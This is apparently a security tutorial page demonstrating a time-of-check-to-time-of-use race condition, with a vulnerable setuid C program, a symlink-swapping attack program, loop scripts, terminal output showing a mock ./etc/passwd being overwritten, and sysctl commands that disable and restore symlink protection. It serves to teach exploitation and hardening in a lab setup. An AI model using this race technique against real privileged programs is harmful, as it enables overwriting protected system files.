<div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Contents -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-1411820076951016"
     data-ad-slot="3793401480"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>

Excuse the ads! We need some help to keep our site up.

<div id="google_translate_element"></div><script type="text/javascript">
function googleTranslateElementInit() {
  new google.translate.TranslateElement({pageLanguage: 'ko', layout: google.translate.TranslateElement.InlineLayout.SIMPLE, multilanguagePage: true, gaTrack: true, gaId: 'UA-92563911-1'}, 'google_translate_element');
}
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>

List

Race condition

CWE - Race Condition

Time of check to time of use(TOCTTOU)

Proof of concept

lazenca0x0@ubuntu:~/Exploit/RaceCondition$ mkdir etc
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ cd etc
lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ echo Only Root! > passwd 
lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ cat passwd 
Only Root!
lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ sudo chown root:root passwd 
lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ sudo chmod 644 passwd 
lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ ls -al passwd 
-rw-r--r-- 1 root root 13 Jun 26 00:46 passwd
lazenca0x0@ubuntu:~/Exploit/RaceCondition/etc$ cd ..
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ echo > file
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
 
void main()
{
    int fd;
    char *file = "./file";
    char buffer[]="Success!! Race Condition : lazenca.0x0\n";

    if (!access(file, W_OK)) {
		printf("Able to open file %s.\n",file);
		fd = open(file, O_WRONLY);
		write(fd, buffer, sizeof(buffer));
		close(fd); 
    }else{
		//printf("Unable to open file %s.\n",file);
    }
}
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void main()
{
    unlink("file");
    symlink("./etc/passwd","file");
}
#!/bin/bash
while :
do
    ./vuln
done
#!/bin/bash
CHECK_FILE="ls -l ./etc/passwd"
old=$($CHECK_FILE)
new=$($CHECK_FILE)
while [ "$old" == "$new" ]
do
    ./attack
    new=$($CHECK_FILE)
done
echo "Success! The passwd file has been changed"
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ gcc -o vuln vuln.c 
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ sudo chown root:root vuln
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ sudo chmod 4755 ./vuln
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ gcc -o attack attack.c 

Exploit

lazenca0x0@ubuntu:~/Exploit/RaceCondition$ sudo sysctl -w fs.protected_symlinks=0
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ ./run.sh
Able to open file ./file.
Able to open file ./file.
Able to open file ./file.

...
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ ./race.sh 
Success! The passwd file has been changed
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ cat ./etc/passwd 
Success!! Race Condition : lazenca.0x0
lazenca0x0@ubuntu:~/Exploit/RaceCondition$ 

File system hardening

Ubuntu 12.04
$ sudo sysctl -w kernel.yama.protected_sticky_symlinks=0
Ubuntu 16.04
$ sudo sysctl -w fs.protected_symlinks=0
Ubuntu 12.04
$ sudo sysctl -w kernel.yama.protected_sticky_symlinks=1
Ubuntu 16.04
$ sudo sysctl -w fs.protected_symlinks=1

Related site

<div align="center">
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Contents -->
<ins class="adsbygoogle"
     style="display:inline-block;width:728px;height:90px"
     data-ad-client="ca-pub-1411820076951016"
     data-ad-slot="3793401480"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</div>